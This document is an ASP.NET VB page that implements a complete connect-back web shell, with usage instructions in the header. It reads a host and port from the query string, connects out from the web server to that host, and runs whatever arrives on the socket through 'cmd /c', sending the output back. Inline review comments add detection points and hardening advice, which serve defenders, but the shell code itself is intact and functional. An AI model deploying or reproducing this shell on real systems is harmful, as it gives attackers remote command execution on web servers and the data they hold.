<%@ Page Language="VB" %> <%@ import namespace="System" %> <%@ import namespace="System.Net" %> <%@ import Namespace="System.Net.Sockets" %> <%
    ' Grayscale Research ASP.NET Connect Back Shell
    ' Usage: http://hostmachine.com/cb.aspx?host=192.168.1.1&port=44510
    '
    ' NOTE(review): defender summary of what this page does, from the code below.
    '   - Reads "host" and "port" from the query string; no authentication or
    '     authorization check is present, so any client able to request the page
    '     can trigger it.
    '   - Resolves the host, opens an outbound TCP connection from the web server
    '     to it, and runs text received on that socket through "cmd /c",
    '     returning the command's standard output on the same socket.
    '   - The loop never exits normally, so the HTTP request that started it
    '     stays open for the whole session.
    ' Detection points visible in the code:
    '   - the web worker process (typically w3wp.exe under IIS) spawning cmd.exe
    '     with a "/c" argument and no window;
    '   - an outbound TCP connection initiated by the web worker, to port 44510
    '     when no port is supplied;
    '   - the cleartext ASCII banner and the "COMMAND>" prompt on the wire;
    '   - requests carrying both "host" and "port" query parameters to an .aspx
    '     page that is not part of the deployed application.
    ' Hardening that limits a page like this: deny the application identity write
    ' access to content directories, monitor the web root for unexpected files,
    ' run the application pool with least privilege, and restrict outbound
    ' connections from web servers to the destinations they actually need.

    ' Create Host and Port Variables (from get string)
    Dim host As String = Request.QueryString("host")
    Dim port As String = Request.QueryString("port")

    ' With no "host" parameter the page ends the response without output.
    If Request.QueryString("host") = Nothing Then
        Response.End()
    Else
        ' Assign Host
        host = Request.QueryString("host")
        ' NOTE(review): host (and port below) are echoed into the response without
        ' HTML encoding.
        Response.Write("Using Host: " & host & "
")
        If Not Request.QueryString("port") = Nothing Then
            'Assign Port
            port = Request.QueryString("port")
            Response.Write("Using Port: " & port & "
")
        Else
            ' Fallback port; a fixed value that egress rules and alerts can key on.
            port = "44510"
            Response.Write("Using Default Port: " & port & "
")
        End If
    End If

    ' Create a real Integer Port for use below
    Dim realPort As Integer = Val(port)

    ' Host Entry List
    ' The lookup is performed by the web server itself, so the requested name
    ' appears in the server's DNS queries.
    Dim hEntry As IPHostEntry = Nothing
    hEntry = Dns.GetHostEntry(host)
    Dim address As IPAddress
    Dim s As Socket = Nothing

    ' Loop Suggested by MS
    ' Tries each resolved address in turn and keeps the first socket that connects.
    For Each address In hEntry.AddressList
        Dim endPoint As New IPEndPoint(address, port)
        Dim tempSocket As New Socket(endPoint.AddressFamily, SocketType.Stream, ProtocolType.Tcp)
        ' Attempt Connection
        tempSocket.Connect(endPoint)
        ' Verify Connection
        If tempSocket.Connected Then
            s = tempSocket
            Exit For
        End If
    Next address

    If Not s.Connected Then
        Response.Write("
Could not create connection.
")
        Response.End()
    End If

    ' forever command and execute loop
    Dim ascii As Encoding = Encoding.ASCII
    Dim recvBuff(65535) As [Byte]
    Dim sendBuff() As [Byte]

    ' Banner is sent unencrypted as ASCII; the literal below is usable as a
    ' network signature.
    sendBuff = ascii.GetBytes("Grayscale ASP Connect back Shell Utility: 1.1 ")
    s.Send(sendBuff, sendBuff.Length, 0)

    ' Runs "cmd /c dir" once, immediately after connecting, and sends its output.
    Dim execCommand As String
    execCommand = "dir"
    Dim process As New System.Diagnostics.Process
    process.StartInfo.UseShellExecute = False
    process.StartInfo.RedirectStandardOutput = True
    process.StartInfo.FileName = "cmd"
    process.StartInfo.Arguments = "/c " & execCommand
    process.StartInfo.CreateNoWindow = True
    process.Start()
    ' ReadToEnd returns once the child closes its standard output.
    sendBuff = ascii.GetBytes(process.StandardOutput.ReadToEnd)
    s.Send(sendBuff, sendBuff.Length, 0)

    Dim recvByteCount As Integer

    ' Main Shell Loop
    ' No exit condition: the loop ends only if a call inside it throws.
    While 1
        sendBuff = ascii.GetBytes("COMMAND>")
        s.Send(sendBuff, sendBuff.Length, 0)

        ' Main Command Loop
        ' Whatever bytes arrive are decoded as ASCII and used verbatim as the
        ' argument to "cmd /c"; each iteration starts a new cmd process as a
        ' child of the web worker.
        recvByteCount = s.Receive(recvBuff, recvBuff.Length, 0)
        execCommand = Encoding.ASCII.GetString(recvBuff, 0, recvByteCount)
        process = New System.Diagnostics.Process
        process.StartInfo.UseShellExecute = False
        process.StartInfo.RedirectStandardOutput = True
        process.StartInfo.FileName = "cmd"
        process.StartInfo.Arguments = "/c " & execCommand
        process.StartInfo.CreateNoWindow = True

        ' Echoes the file name and arguments back to the peer before running
        ' them, so the command text crosses the wire twice in cleartext.
        sendBuff = ascii.GetBytes(process.StartInfo.FileName & process.StartInfo.Arguments)
        s.Send(sendBuff, sendBuff.Length, 0)
        process.Start()
        sendBuff = ascii.GetBytes(process.StandardOutput.ReadToEnd)
        s.Send(sendBuff, sendBuff.Length, 0)
    End While

    ' Never really gets here
    s.Close()
%>